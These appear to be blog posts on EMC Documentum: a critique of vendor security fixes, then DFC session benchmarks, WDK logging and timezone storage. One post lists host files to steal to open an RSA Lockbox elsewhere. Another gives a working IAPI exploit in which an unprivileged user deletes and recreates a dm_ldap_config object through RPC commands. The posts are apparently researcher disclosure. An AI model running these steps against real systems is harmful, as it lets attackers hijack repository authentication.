Security enhancements in Webtop 6.8

CVE-2014-4637 quote:

Open redirect vulnerability in EMC Documentum Web Development Kit (WDK) before 6.8 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via an unspecified parameter.

Real behaviour of Webtop 6.8 (note how it sends the login ticket to the remote site):

CVE-2014-4636 quote:

Cross-site request forgery (CSRF) vulnerability in EMC Documentum Web Development Kit (WDK) before 6.8 allows remote attackers to hijack the authentication of arbitrary users for requests that perform Docbase operations.

Real behaviour of webtop 6.8:

New joke about security from EMC

Today EMC announced a new security advisory:

According to the release notes, Content Server got the following security “improvements” in 7.2:

I have no idea what “dm_crypto_boot utility is enhanced to load an AEK into the shared memory” means, because this capability has existed in Content Server for a long time; for example, a quote from the Admin Guide 6.7:

So, “dm_crypto_boot utility is enhanced to load an AEK into the shared memory” is not a security enhancement (actually, folks told me that the installer now enforces entering a passphrase for aek.key during installation), and the only real enhancement is support for RSA Lockbox. Moreover, according to EMC it is the only option to “prevent” the aek.key file from being hijacked, but if you read my post about CVE-2014-2515 carefully, you should know that RSA Lockbox does not introduce any security features – to open an RSA Lockbox on another machine it is enough to hijack the following files from the victim machine:

  • /etc/sysconfig/network – to get hostname
  • /etc/udev/rules.d/70-persistent-net.rules – to get information about network interfaces
  • /etc/sysconfig/network-scripts/ifcfg-*, /var/lib/dhclient/dhclient*.leases – to get more information about network interfaces
  • /proc/version, /proc/swaps, /proc/cpuinfo, /proc/partitions – RSA Lockbox uses these files to bind itself to specific machine
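To illustrate why copying those files defeats the binding, here is a hypothetical sketch (this is not RSA Lockbox’s actual algorithm – the exact file list and the SHA-256 digest are assumptions for demonstration): a “fingerprint” computed from host-specific files is trivially reproducible by anyone who obtains the same file contents.

```java
import java.io.IOException;
import java.nio.file.Files;
import java.nio.file.Path;
import java.nio.file.Paths;
import java.security.MessageDigest;
import java.security.NoSuchAlgorithmException;
import java.util.ArrayList;
import java.util.List;

public class HostFingerprint {

    // hex SHA-256 over the concatenated inputs: identical file contents
    // always reproduce an identical "fingerprint"
    static String digest(byte[]... parts) {
        try {
            MessageDigest md = MessageDigest.getInstance("SHA-256");
            for (byte[] part : parts) {
                md.update(part);
            }
            StringBuilder hex = new StringBuilder();
            for (byte b : md.digest()) {
                hex.append(String.format("%02x", b));
            }
            return hex.toString();
        } catch (NoSuchAlgorithmException e) {
            throw new IllegalStateException(e);
        }
    }

    public static void main(String[] args) throws IOException {
        // host-specific files; an attacker who hijacks their contents can
        // recompute the same value on another machine
        String[] sources = {"/etc/sysconfig/network", "/proc/version",
                "/proc/cpuinfo", "/proc/partitions", "/proc/swaps"};
        List<byte[]> parts = new ArrayList<>();
        for (String source : sources) {
            Path path = Paths.get(source);
            if (Files.isReadable(path)) {
                parts.add(Files.readAllBytes(path));
            }
        }
        System.out.println(digest(parts.toArray(new byte[0][])));
    }
}
```

Run it against the victim’s copies of the files and against the originals: the digests match, so nothing in such a scheme is actually secret.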

In the next post I’m going to demonstrate how it works.

Is it possible to compromise Documentum by deleting an object? Solution

The solution is based on the fact that Content Server fails to properly maintain references between objects; for example, an attacker is able to delete and then recreate a dm_ldap_config object:

--
-- configuring dm_ldap_config and dm_server_config
-- under superuser account
--
API> create,c,dm_ldap_config
...
0801ffd7805ca7ff
API> save,c,l
...
OK
API> retrieve,c,dm_server_config
...
3d01ffd780000102
API> set,c,l,ldap_config_id
SET> 0801ffd7805ca7ff
...
OK
API> save,c,l
...
OK
API> connect,ssc_dev,test01,test01
...
s1
--
-- attacker is unable to modify the dm_ldap_config object
--
API> destroy,c,0801ffd7805ca7ff
...
[DM_SYSOBJECT_E_NO_DELETE_ACCESS]error:  
    "No delete access for sysobject named ''"

API> save,c,0801ffd7805ca7ff
...
[DM_SYSOBJECT_E_NO_WRITE_ACCESS]error:  
    "No write access for sysobject named ''."


API> get,c,0801ffd7805ca7ff,i_vstamp
...
0
--
-- but attacker is able to delete dm_ldap_config object
-- using dmDisplayConfigExpunge RPC command
--
API> apply,c,0801ffd7805ca7ff,dmDisplayConfigExpunge,
       OBJECT_TYPE,S,dm_ldap_config,i_vstamp,I,0
...
q0
API> next,c,q0
...
OK
API> dump,c,q0
...
USER ATTRIBUTES

  result                          : T

SYSTEM ATTRIBUTES


APPLICATION ATTRIBUTES


INTERNAL ATTRIBUTES


API> close,c,q0
...
OK
--
-- dm_ldap_config object got deleted
--
API> revert,c,0801ffd7805ca7ff
...
[DM_API_E_EXIST]error:  
  "Document/object specified by 0801ffd7805ca7ff does not exist."

[DM_SYSOBJECT_E_CANT_FETCH_INVALID_ID]error:  
   "Cannot fetch a sysobject - Invalid object ID : 0801ffd7805ca7ff"

[DM_API_E_EXIST]error:  
   "Document/object specified by 0801ffd7805ca7ff does not exist."

[DM_SYSOBJECT_E_CANT_FETCH_INVALID_ID]error:  
   "Cannot fetch a sysobject - Invalid object ID : 0801ffd7805ca7ff"

[DM_OBJ_MGR_E_FETCH_FAIL]error:  
   "attempt to fetch object with handle 0801ffd7805ca7ff failed"

--
-- now attacker creates his own dm_ldap_config object
--
API> apply,c,0801ffd7805ca7ff,SysObjSave,
       OBJECT_TYPE,S,dm_ldap_config,
       IS_NEW_OBJECT,B,T,
       i_vstamp,I,0,
       object_name,S,malicious,
       i_has_folder,B,T,
       r_object_type,S,dm_ldap_config,
       owner_name,S,test01,
       owner_permit,I,7
...
q0
API> next,c,q0
...
OK
API> dump,c,q0
...
USER ATTRIBUTES

  result                          : 1

SYSTEM ATTRIBUTES


APPLICATION ATTRIBUTES


INTERNAL ATTRIBUTES


API> revert,c,0801ffd7805ca7ff
...
OK
API> dump,c,0801ffd7805ca7ff
...
USER ATTRIBUTES

  object_name                     : malicious
  title                           :
  subject                         :

API> save,c,0801ffd7805ca7ff
...
OK
--
-- now dm_server_config references the
-- malicious dm_ldap_config object
--
API> revert,c,3d01ffd780000102
...
OK
API> get,c,l,ldap_config_id
...
0801ffd7805ca7ff

Session management. Horse races

Just raw results without explanation…

Horses: Session, SessionI, SessionII, SessionIII, SessionIV, SessionV, SessionVI, SessionVII, DarkHorse – each implements a different pattern for acquiring a DFC session

DFC Settings:

  • default – means default settings
  • reuse_limit – dfc.session.reuse_limit = 2147483647
  • global_pool – dfc.session.global_pool_enabled=true
  • old pool – dfc.compatibility.useD7SessionPooling=false

Results: DFC benchmark

DNF (did not finish) means that enabling the global pool causes thread-safety issues like:

java.util.NoSuchElementException
        at java.util.LinkedList.getFirst(LinkedList.java:109)
        at com.documentum.fc.client.impl.session.GlobalSessionPool.get(GlobalSessionPool.java:41)
        at com.documentum.fc.client.impl.session.PooledSessionFactory.newSession(PooledSessionFactory.java:33)
        at com.documentum.fc.client.impl.session.SessionManager.getSessionFromFactory(SessionManager.java:134)
        at com.documentum.fc.client.impl.session.SessionManager.newSession(SessionManager.java:72)
        at com.documentum.fc.client.impl.session.SessionManager.getSession(SessionManager.java:191)
        at tel.panfilov.documentum.benchmark.impl.Session.doOp(Session.java:31)
        at tel.panfilov.documentum.benchmark.impl.SessionI.doOp(SessionI.java:14)
        at tel.panfilov.documentum.benchmark.Benchmark.run(Benchmark.java:105)
        at java.lang.Thread.run(Thread.java:662)


java.util.ConcurrentModificationException
        at java.util.LinkedList$ListItr.checkForComodification(LinkedList.java:761)
        at java.util.LinkedList$ListItr.remove(LinkedList.java:729)
        at com.documentum.fc.client.impl.session.GlobalSessionPool.flush(GlobalSessionPool.java:114)
        at com.documentum.fc.client.impl.session.PooledSessionFactory.flush(PooledSessionFactory.java:80)
        at com.documentum.fc.client.impl.session.SessionManager.flushSessions(SessionManager.java:259)
        at com.documentum.fc.client.impl.session.SessionManager.flushSessions(SessionManager.java:287)
        at tel.panfilov.documentum.benchmark.impl.SessionIII.doOp(SessionIII.java:15)
        at tel.panfilov.documentum.benchmark.Benchmark.run(Benchmark.java:105)
        at java.lang.Thread.run(Thread.java:662)


Exception in thread "Global Session pool worker" java.util.ConcurrentModificationException
        at java.util.LinkedList$ListItr.checkForComodification(LinkedList.java:761)
        at java.util.LinkedList$ListItr.next(LinkedList.java:696)
        at com.documentum.fc.client.impl.session.GlobalSessionPool.flushExpiredSessions(GlobalSessionPool.java:203)
        at com.documentum.fc.client.impl.session.GlobalSessionPool$ExpirationThread.run(GlobalSessionPool.java:232)
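The NoSuchElementException above is a classic check-then-act race on an unsynchronized LinkedList: one thread observes a non-empty pool, another thread drains it in between, and the first thread’s getFirst() then fails. A minimal sketch of that interleaving, simulated in a single thread for determinism (GlobalSessionPool’s real internals are not shown here, this only models the race):

```java
import java.util.LinkedList;
import java.util.NoSuchElementException;

public class PoolRaceSketch {

    // simulate: thread A checks the pool, thread B steals the last entry,
    // then thread A calls getFirst() on a now-empty list
    static String raceResult() {
        LinkedList<String> pool = new LinkedList<>();
        pool.add("session");
        boolean seenNonEmpty = !pool.isEmpty(); // thread A's check
        pool.removeFirst();                     // thread B runs in between
        try {
            if (seenNonEmpty) {
                pool.getFirst();                // thread A's act
            }
            return "ok";
        } catch (NoSuchElementException e) {
            return "NoSuchElementException";
        }
    }

    public static void main(String[] args) {
        System.out.println(raceResult());
    }
}
```

The ConcurrentModificationException traces are the same defect seen from the iterator side: one thread flushes the list while another iterates it.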

Power Pivot

To investigate performance problems in WDK applications I typically use the capabilities of the com.documentum.web.env.IFormRenderListener interface. The code below demonstrates the basic idea – when a page starts rendering I put the current date into a form return value, and when page rendering finishes I gather and log the required information:

/**
 * @author Andrey B. Panfilov <andrew@panfilov.tel>
 */
public class FormRenderLogger implements IFormRenderListener {

    private static final String FORM_RENDER_LOGGER_START_DATE = "__FORM_RENDER_LOGGER_START_DATE__";

    public FormRenderLogger() {
        super();
    }

    public void notifyFormRenderStart(Form form) {
        form.setReturnValue(FORM_RENDER_LOGGER_START_DATE, new Date());
    }

    public void notifyFormRenderFinish(Form form) {
        Date startDate = (Date) form
                .getReturnValue(FORM_RENDER_LOGGER_START_DATE);
        form.removeReturnValue(FORM_RENDER_LOGGER_START_DATE);
        long diff = new Date().getTime() - startDate.getTime();
        String containerId = null;
        String componentId = null;
        ArgumentList initArgs = null;
        Context context = null;
        if (form instanceof Container) {
            containerId = ((Container) form).getId();
            componentId = ((Container) form).getContainedComponentId();
            initArgs = ((Container) form).getInitArgs();
            context = ((Container) form).getContext();
        } else if (form instanceof Component) {
            componentId = ((Component) form).getComponentId();
            initArgs = ((Component) form).getInitArgs();
            context = ((Component) form).getContext();
        }
        String userName = null;
        try {
            if (ComponentDispatcher.isRepositoryAccessRequiredComponent(form
                    .getId())) {
                IDfSessionManager sessionManager = SessionManagerHttpBinding
                        .getSessionManager();
                if (sessionManager != null
                        && SessionManagerHttpBinding.getCurrentDocbase() != null
                        && sessionManager.hasIdentity(SessionManagerHttpBinding
                                .getCurrentDocbase())
                        && form instanceof Component) {
                    userName = ((Component) form).getDfSession()
                            .getLoginUserName();
                }
            }
        } catch (DfException ex) {
            throw new WrapperRuntimeException(ex);
        }
        StringBuilder message = new StringBuilder(50);
        if (containerId != null) {
            message.append("Container: ").append(containerId).append(", ");
        }
        if (componentId != null) {
            message.append("Component: ").append(componentId).append(", ");
        }
        if (userName != null) {
            message.append("User: ").append(userName).append(", ");
        }
        if (initArgs != null) {
            message.append("InitArgs: ").append(initArgs).append(", ");
        }
        if (context != null) {
            message.append("Context: ").append(context).append(", ");
        }
        message.append("Remote IP: ")
                .append(form.getPageContext().getRequest().getRemoteHost())
                .append(", ");
        message.append("Render time: ").append(diff).append("ms");
        DfLogger.debug(this, message.toString().replaceAll("\\{", "[")
                .replaceAll("\\}", "]"), null, null);
    }

}

app.xml:

<?xml version="1.0" encoding="UTF-8" standalone="no"?>
<config>
 <scope>
  <application extends="webtop/app.xml">
   ...
   <listeners>
    ...
    <formrender-listeners>
     <listener>
      ...
      <class>FormRenderLogger</class>
     </listener>
    </formrender-listeners>
   </listeners>
  </application>
 </scope>
</config>

Something similar was described earlier by Stephane Marcon in Documentum Monitoring – platform logs’ centralization using Logfaces – Part 2, but the problem is that the accuracy of the Webtop logs collected by Stephane is poor. Though the code given above does not provide information about delays caused by WDK actions, you can take advantage of the IFormRenderListener, IApplicationListener and IRequestListener interfaces to implement a more robust solution (see an example of usage in Dynamic groups. Advances. Part IV).

But yesterday I faced a weird problem. Typically I parse performance logs into a tab-delimited file, then load this file into Excel and build some reports to figure out which WDK components are slow. But yesterday I found that the customer’s daily logs contain more than 3 million rows, and Excel does not support such an amount of data (a worksheet is limited to 1,048,576 rows). What to do? Power Pivot comes to the rescue!

Time in Documentum

Since the D6 release EMC changed the manner of storing dates in the database – now Content Server stores dates in UTC by default. The problem is that the new settings are totally undocumented.

Misleading documentation

Powerlink states:

  1. The r_normal_tz property, in the docbase config object controls how Content Server stores dates in the repository. If set to 0, all dates are stored in UTC time. If set to an offset value, dates are normalized using the offset value before being stored in the repository. If set to an offset value, the property must be set to a time zone offset from UTC time, expressed as seconds. For example, if the offset represents the Pacific Standard Time zone, the offset value is -8*60*60, or -28800 seconds. When the property is set to an offset value, Content Server stores all date values based on the time identified by the time zone offset.
    Refer to the Content Server Administration Guide V6.0 for more information about how the value set for this attribute is used to set the timestamp, depending on whether the client is 6.0 and up or pre-6.0.
  2. To answer the question on how this value is set:
    In a new Documentum 6 or later repository, r_normal_tz is set to 0. In a repository upgraded from a release prior to Version 6, r_normal_tz is set to the offset representing Content Server local time. Therefore, if set and this value was not set manually, this was probably an upgrade from a pre-6.0 version Docbase.
  3. The r_tz_aware set to FALSE makes the Content Server not aware of the time zone.
    This attribute is not documented presently (I do not know why), but if the customer’s r_normal_tz is set to a non-zero value, then they probably upgraded their docbase and possibly FALSE is the default value for this attribute in the case of an upgrade.

This KB article is absolutely incorrect; let’s explain why.

r_normal_tz

At first glance it is a totally stupid idea to normalize dates using a static offset – how are they going to manage daylight saving time? Change r_normal_tz every half a year and restart the server? Let’s check what happens if we change r_normal_tz in the docbase config:

Default settings (r_normal_tz=0, r_tz_aware=T):

Connected to Documentum Server running Release 7.0.0100.0603  Linux.Oracle  
1> select r_normal_tz, r_tz_aware, r_creation_date from dm_docbase_config  
2> go  
r_normal_tz   r_tz_aware    r_creation_date  
------------  ------------  -------------------------  
           0             1  10/31/2013 13:29:41  
(1 row affected)
SQL> ALTER SESSION set NLS_DATE_FORMAT='YYYY-MM-DD HH24:MI:SS';  
  
Session altered.  
  
SQL> SELECT r_creation_date AS r_creation_date_utc,  
       CAST (  
          (FROM_TZ (CAST (r_creation_date AS TIMESTAMP), '+00:00')  
              AT TIME ZONE 'Europe/Moscow') AS DATE)  
          AS r_creation_date  
  FROM dm_docbase_config_sp;  
  
R_CREATION_DATE_UTC R_CREATION_DATE  
------------------- -------------------  
2013-10-31 09:29:41 2013-10-31 13:29:41 

UTC+10 offset:

Connected to Documentum Server running Release 7.0.0100.0603  Linux.Oracle  
1> select r_normal_tz, r_tz_aware, r_creation_date from dm_docbase_config  
2> go  
r_normal_tz   r_tz_aware    r_creation_date  
------------  ------------  -------------------------  
       36000             1  10/31/2013 09:29:41  
(1 row affected) 

UTC-10 offset:

Connected to Documentum Server running Release 7.0.0100.0603  Linux.Oracle  
1> select r_normal_tz, r_tz_aware, r_creation_date from dm_docbase_config  
2> go  
r_normal_tz   r_tz_aware    r_creation_date  
------------  ------------  -------------------------  
      -36000             1  10/31/2013 09:29:41  
(1 row affected)  

So, the value of the r_normal_tz parameter has nothing in common with the timezone: if r_normal_tz=0, CS converts dates to UTC before storing them in the database; if r_normal_tz!=0, CS stores dates without conversion, i.e. database dates are local. Actually this new behaviour has some issues:

  1. When you use reporting software and write reports against the database, you should take this “feature” into account and cast dates to local time
  2. The UTC timescale is always straightforward, but localtime is not, due to DST. So there are ambiguities in converting localtime to UTC and back: for example, 2010-10-30 22:30:00 UTC and 2010-10-30 23:30:00 UTC have the same representation in the Moscow timezone, so if you were “lucky” and created a document between those two instants, you can’t find it by creation date, because DFC will convert the dates you enter into dates after 2010-10-30 23:30:00 UTC
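The Moscow ambiguity from item 2 is easy to reproduce with java.time (a sketch using the historical 2010 fall-back, when clocks in Europe/Moscow went from UTC+4 back to UTC+3):

```java
import java.time.Instant;
import java.time.ZoneId;
import java.time.format.DateTimeFormatter;

public class DstAmbiguity {

    // render a UTC instant as Moscow local time
    static String moscowLocal(String utcInstant) {
        return Instant.parse(utcInstant)
                .atZone(ZoneId.of("Europe/Moscow"))
                .format(DateTimeFormatter.ofPattern("yyyy-MM-dd HH:mm:ss"));
    }

    public static void main(String[] args) {
        // two distinct UTC instants one hour apart, straddling the switch...
        String first = moscowLocal("2010-10-30T22:30:00Z");  // MSD, UTC+4
        String second = moscowLocal("2010-10-30T23:30:00Z"); // MSK, UTC+3
        // ...collapse to the same local representation
        System.out.println(first + " == " + second);
    }
}
```

Both instants print as 2010-10-31 02:30:00 local time, so a localtime value from that hour cannot be mapped back to a unique UTC instant.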

r_tz_aware

My dctmpy library is able to emulate the two major versions of the DFC protocol (i.e. pre-D6 and post-D6) and makes it easier to view the traffic passed between CS and client than capturing network traffic or parsing DFC logs. Test script:

#!python  
from dctmpy.docbase import Docbase  
  
  
def main():  
    session = Docbase(host="192.168.2.56", port=12000)  
    session.authenticate("dmadmin", "dmadmin")  
    for e in session.query("SELECT r_creation_date as dt FROM dm_docbase_config"):  
        print e.__buffer__  
  
  
if __name__ == "__main__":  
    main() 

A little patch to show the serialized data:

Index: dctmpy/obj/collection.py  
===================================================================  
--- dctmpy/obj/collection.py    (revision 34)  
+++ dctmpy/obj/collection.py    (working copy)  
@@ -110,7 +110,9 @@  
  
class CollectionEntry(TypedObject):  
     def __init__(self, **kwargs):  
+        b = kwargs.get("buffer")  
         super(CollectionEntry, self).__init__(**kwargs)  
+        self.__buffer__ = b[0: len(b) - len(self.buffer)]  
  
     def readHeader(self):  
         pass 

post-D6 traffic (note that the server now thinks that all previous dates are local, though they were initially stored in UTC):

OBJ QR 0 0 0 1  
B S 4 2013-10-31T05:29:41Z  
0  
0  

pre-D6 traffic:

OBJ QR 1  
xxx Oct 31 09:29:41 2013  
0

So, D6 clients use the ISO 8601 format to transfer dates, while old clients use a “proprietary” format. Now, what happens if we switch r_tz_aware to false?

DFC:

1> select r_normal_tz, r_tz_aware, r_creation_date from dm_docbase_config  
2> go  
r_normal_tz   r_tz_aware    r_creation_date  
------------  ------------  -------------------------  
      -36000             0  10/31/2013 09:29:41  
(1 row affected)  

python:

OBJ QR 0 0 0 1  
B S 4 xxx Oct 31 09:29:41 2013  
0  
0

So, setting r_tz_aware to false switches the “date protocol” to the pre-D6 version. In practice this means that if you have DFC clients that use a timezone different from the CS one, those clients will send and receive wrong data:

~]$ cat > Test.java  
import com.documentum.com.DfClientX;  
import com.documentum.fc.client.IDfSession;  
import com.documentum.fc.common.DfException;  
import com.documentum.fc.common.DfLoginInfo;  
  
/** 
* @author Andrey B. Panfilov <andrew@panfilov.tel> 
*/  
public class Test {  
  
    public static void main(String[] argv) throws DfException {  
        IDfSession session = new DfClientX().getLocalClient().newSession(  
                "ssc_dev", new DfLoginInfo("dmadmin", "dmadmin"));  
        System.out.println(session.getDocbaseConfig()  
                .getTime("r_creation_date")  
                .asString("yyyy.MM.dd G 'at' HH:mm:ss z"));  
        session.disconnect();  
    }  
  
}  
~]$ javac Test.java  
~]$ java Test  
2013.10.31 н.э. at 09:29:41 MSK  
~]$ java -Duser.timezone=Asia/Vladivostok Test  
2013.10.31 н.э. at 09:29:41 VLAT  
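The difference between the two wire formats can be reproduced without Documentum at all: an ISO 8601 value pins an instant and renders differently per timezone, while a bare timestamp carries no zone information, so every client reads the same wall clock, as Test.java shows above. A sketch (the format patterns here are illustrative assumptions, not the exact DMCL ones):

```java
import java.time.Instant;
import java.time.LocalDateTime;
import java.time.ZoneId;
import java.time.format.DateTimeFormatter;
import java.util.Locale;

public class WireFormats {

    // post-D6 style: ISO 8601 pins the instant, rendering shifts per zone
    static String renderIso(String wire, String zone) {
        return Instant.parse(wire).atZone(ZoneId.of(zone))
                .format(DateTimeFormatter.ofPattern("HH:mm:ss"));
    }

    // pre-D6 style: a bare timestamp carries no zone, so every client
    // reads the same wall clock whatever its own timezone is
    static String renderBare(String wire) {
        DateTimeFormatter bare = DateTimeFormatter
                .ofPattern("MMM dd HH:mm:ss yyyy", Locale.ENGLISH);
        return LocalDateTime.parse(wire, bare)
                .format(DateTimeFormatter.ofPattern("HH:mm:ss"));
    }

    public static void main(String[] args) {
        System.out.println(renderIso("2013-10-31T05:29:41Z", "Europe/Moscow"));
        System.out.println(renderIso("2013-10-31T05:29:41Z", "Asia/Vladivostok"));
        System.out.println(renderBare("Oct 31 09:29:41 2013"));
    }
}
```

The ISO value renders as 09:29:41 in Moscow and 16:29:41 in Vladivostok, while the bare value renders as 09:29:41 everywhere – matching the MSK/VLAT output above.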

DFC

DFC clients, like all Java-based clients, use their own calendar instead of the operating system calendar; EMC also introduced a dfc.time_zone parameter:

# The timezone of this DFC instance.
#
# This value is initialized from the Java Virtual Machine at startup time and
# normally doesn’t need to be specified. Legal values are the timezone IDs
# supported by the Java Virtual Machine.
#
dfc.time_zone =

Now we know that CS and DFC interact with each other using the ISO 8601 date format, so what is the purpose of the dfc.time_zone parameter? It just initializes the instances of SimpleDateFormat used internally by DFC with a predefined timezone, but does not change the dates themselves. It is useful when you want to display dates cast to a specific timezone but are not able to set up that timezone for the current environment (UNIXes have the TZ environment variable, Windows does not) or to set the -Duser.timezone property for a Java-based application (like IDQL or IAPI):

Connected to Documentum Server running Release 7.0.0100.0603  Linux.Oracle  
Session id is s0  
API> get,c,apiconfig,dfc.time_zone  
...  
Europe/Moscow  
API> get,c,docbaseconfig,r_creation_date  
...  
10/31/2013 09:29:41  
API> set,c,apiconfig,dfc.time_zone  
SET> Asia/Vladivostok  
...  
OK  
API> connect,ssc_dev,dmadmin,dmadmin  
...  
s1  
API> get,c,docbaseconfig,r_creation_date  
...  
10/31/2013 16:29:41
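The transcript above can be reproduced with plain SimpleDateFormat – a sketch showing that changing the formatter’s timezone changes only the rendering of a fixed instant, which is what dfc.time_zone does for DFC’s internal formatters:

```java
import java.text.ParseException;
import java.text.SimpleDateFormat;
import java.util.Date;
import java.util.TimeZone;

public class DfcTimeZoneEffect {

    // format a fixed instant with a formatter bound to a given timezone,
    // the way dfc.time_zone seeds DFC's internal SimpleDateFormat instances
    static String render(Date instant, String zoneId) {
        SimpleDateFormat fmt = new SimpleDateFormat("MM/dd/yyyy HH:mm:ss");
        fmt.setTimeZone(TimeZone.getTimeZone(zoneId));
        return fmt.format(instant);
    }

    public static void main(String[] args) throws ParseException {
        SimpleDateFormat utc = new SimpleDateFormat("yyyy-MM-dd'T'HH:mm:ss");
        utc.setTimeZone(TimeZone.getTimeZone("UTC"));
        // the instant stored by CS (r_creation_date in UTC)
        Date created = utc.parse("2013-10-31T05:29:41");
        System.out.println(render(created, "Europe/Moscow"));
        System.out.println(render(created, "Asia/Vladivostok"));
    }
}
```

The same Date renders as 10/31/2013 09:29:41 for Europe/Moscow and 10/31/2013 16:29:41 for Asia/Vladivostok, just like the two IAPI sessions above.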

Switching to r_normal_tz=0 from r_normal_tz!=0

The following SQL script will help you to generate UPDATE statements for all date fields (here Europe/Moscow is the server’s local timezone – replace it with your own):

SET LINES 300
SET PAGES 0
SET TRIMSPOOL ON

  SELECT    CASE
           WHEN ROW_NUMBER ()
                OVER (PARTITION BY utc.table_name ORDER BY utc.column_name) =
                   1
           THEN
              'UPDATE ' || utc.TABLE_NAME || ' SET '
        END
     || utc.COLUMN_NAME
     || ' = DECODE('
     || utc.COLUMN_NAME
     || ', NULL, NULL'
     || ', TO_DATE(''0001/01/01'', ''YYYY/MM/DD''), TO_DATE(''0001/01/01'', ''YYYY/MM/DD'')'
     || ', CAST ((FROM_TZ (CAST ('
     || utc.COLUMN_NAME
     || ' AS TIMESTAMP), ''Europe/Moscow'') AT TIME ZONE ''UTC'') AS DATE))'
     || CASE
           WHEN ROW_NUMBER ()
                OVER (PARTITION BY utc.table_name
                      ORDER BY utc.column_name DESC) <> 1
           THEN
              ','
           ELSE
              ';' || CHR (10) || 'COMMIT;'
        END
FROM user_tab_columns utc, user_tables ut
   WHERE utc.data_type = 'DATE' AND utc.table_name = ut.table_name
ORDER BY utc.table_name, utc.column_name;
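In Java terms, the FROM_TZ … AT TIME ZONE 'UTC' conversion that each generated UPDATE performs looks like this (a sketch; Europe/Moscow stands for the server’s local timezone, as in the script above):

```java
import java.time.LocalDateTime;
import java.time.ZoneId;
import java.time.ZoneOffset;
import java.time.format.DateTimeFormatter;

public class NormalizeToUtc {

    static final DateTimeFormatter FMT =
            DateTimeFormatter.ofPattern("yyyy-MM-dd HH:mm:ss");

    // reinterpret a stored local date in the server zone, then shift to UTC:
    // FROM_TZ(CAST(col AS TIMESTAMP), zone) AT TIME ZONE 'UTC'
    static String toUtc(String stored, String serverZone) {
        return LocalDateTime.parse(stored, FMT)
                .atZone(ZoneId.of(serverZone))
                .withZoneSameInstant(ZoneOffset.UTC)
                .format(FMT);
    }

    public static void main(String[] args) {
        // the r_creation_date from the examples above, stored as Moscow local
        System.out.println(toUtc("2013-10-31 13:29:41", "Europe/Moscow"));
    }
}
```

It yields 2013-10-31 09:29:41, matching the R_CREATION_DATE_UTC column in the first SQL*Plus session above.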